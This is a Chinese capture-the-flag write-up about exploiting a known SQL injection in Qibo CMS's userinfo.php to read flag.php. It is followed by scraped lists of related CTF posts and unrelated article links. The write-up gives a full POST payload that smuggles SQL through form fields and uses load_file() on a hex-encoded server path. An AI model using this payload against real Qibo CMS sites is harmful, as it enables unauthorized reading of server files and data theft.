题目在i春秋ctf大本营

又是一道cms的题,打开御剑一通乱扫,发现后台登录地址,访问一看妥妥的齐博cms

记得以前很久以前利用一个注入通用漏洞,这里我贴上链接,里面有原理与利用方法详细说明:

齐博cms_userinfo注入

按照这个思路,我们先在首页注册test1账号并登录,直接访问注入的页面,

先按照之前的套路进行测试:

访问用户信息发现成功执行,说明存在注入漏洞:

之前在打开主页的同时,网页上也给出了绝对路径

因为之前的扫描发现根目录下存在flag.php文件,所以这里应该可以通过注入语句直接读取该文件:

emmmmmmmm报错了,看来是搞错目录了

重新POST新的路径:

url:http://6ee916f6234145eea7de5e0ea799d62b5cb205b5bf6c48e2.game.ichunqiu.com/member/userinfo.php?job=edit&step=2

POST:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870)) where uid=3%23

这次成功了

转载于:https://www.cnblogs.com/Ragd0ll/p/8872496.html

“百度杯”CTF比赛 九月场_再见CMS(齐博cms)相关推荐

  1. “百度杯”CTF比赛 九月场--web Upload

    "百度杯"CTF比赛 九月场--web Upload 基础知识 1.什么是一句话木马? 2.一句话木马的简要原理 3.html渲染过程 解析渲染该过程主要分为以下步骤 解决方案 4 ...

  2. “百度杯”CTF比赛 九月场 Upload解题思路

    Hello,大家好,我是锘锘鸡. 今天分享给大家的是百度杯CTF比赛的Upload解题思路. 先看下题目 提示flag就在flag.php中. 进入答题链接 发现是文件上传,于是好奇的锘锘鸡开始了他的 ...

  3. 【SQL注入】CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL

    目录 1 前言 2 解题步骤 2.1 审题 2.2 判断注入数据类型及闭合方式 2.3 尝试联合查询注入 2.3.1 测试回显列数 2.3.2 测试显示位 2.3.3 爆库 3 总结 1 前言 本节内 ...

  4. “百度杯”CTF比赛 九月场Upload 之菜刀的使用

    最近越学习 越感觉自己菜 然而 这并不是重点 然而 我有一颗上进的心 哈哈哈 敲黑板 划重点了 我们把没用的地方删掉 直接进入菜刀方法解决这道题 题干不是白给的 上传一句话木马 <?php ev ...

  5. “百度杯”CTF比赛 九月场 Code

    前言 这道题基本上花了我差不多快5个小时,前面虽然遇到了小问题,但是自己也是努力攻克掉了,只是卡在了最后那块,看了很多WP,逻辑上花了很久很久才想明白.可以说,这题还是很不错的. WP 打开环境发现是 ...

  6. ctf php fork,i春秋——“百度杯”CTF比赛 九月场——123(Apache解析pht,phtml,php3,phps等 php别名)...

    网页源码提示用户信息在user.php中,直接访问是不会有显示的,于是查找相应的备份文件,vim交换文件等,最后发现/user.php.bak 用burp采用如下配置开始爆破 最后爆破出两个账号 登录 ...

  7. CTFhtml解析php,i春秋——“百度杯”CTF比赛 九月场——123(Apache解析pht,phtml,php3等 php别名) Web程序 - 贪吃蛇学院-专业IT技术平台...

    网页源码提示用户信息在user.php中,直接访问是不会有显示的,于是查找相应的备份文件,vim交换文件等,最后发现/user.php.bak 用burp采用如下配置开始爆破 最后爆破出两个账号 登录 ...

  8. [WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程

    中华人民共和国网络安全法(出版物)_360百科 可以说一道经典的CTF题目,解这道题的过程类似于我们渗透测试的过程,所以把它放在了这个专栏,在这里我们详细讲过程,而不是原理. 目录 题目 寻找方向 f ...

  9. “百度杯”CTF比赛 十一月场Look

    最近一直在刷百度杯的题目,感觉每个题目都能涉及到很多知识点,写点wp记录一下 进入后看见页面空白,这个时候一般用dirsearch扫一下,同时burp抓包看一下 看到响应头里有X-HT,这应该是一个提 ...

最新文章

  1. 凯撒密码、GDP格式化输出、99乘法表
  2. 圆弧周长公式_建筑工程施工,最常用计算公式 (大全)
  3. 你的网页加载太慢了怎么办?
  4. 爬虫-09-get请求发起-响应对象的属性了解-练习图片的爬取
  5. duplicate复制数据库
  6. linux做伪分布时ip设置,Linux下伪分布模式的Hadoop部署
  7. 字符串函数rpartition与partition
  8. PCA图像转正C++
  9. gitee图床失效后处理
  10. 框架整合——Spring与MyBatis框架整合
  11. CDH使用之CM 5.3.x安装
  12. idea如何操控git分支
  13. 在线旅游网站技术讲解
  14. 张益唐朗道-西格尔零点猜想报告:“部分地解决黎曼假设应该是对的”
  15. ps常用快捷键 常用的
  16. Photoshop-RGB色彩模式
  17. 解决Error: Call to undefined function eregi() 报错方法
  18. ArcGIS——使用符号级别区分重叠的面图层
  19. 用了接口还有必要用抽象类吗?
  20. 武汉的樱花开了!出不了门别担心,线上带你开樱花![Python画樱花]

热门文章

  1. matlab画相轨迹,非线性振动系统相轨迹对应波形图的绘制方法
  2. 在Ubuntu18.04上搭建私有网盘 —— ownCloud
  3. 软件测试电商项目实战(写进简历没问题)
  4. 多表 JOIN 查询统计要记得去重
  5. python两种方法解决线程冲突问题
  6. js/javascript/JS/Javascript/JavaScript/Js-牛客系列之HJ77.火车进站
  7. 【Android】项目中音频文件的存储位置
  8. C#基础篇 - 正则表达式入门
  9. python合成视频_使用 Python 把多个 MP4 合成一个视频(转)
  10. 关于有道云页面比例问题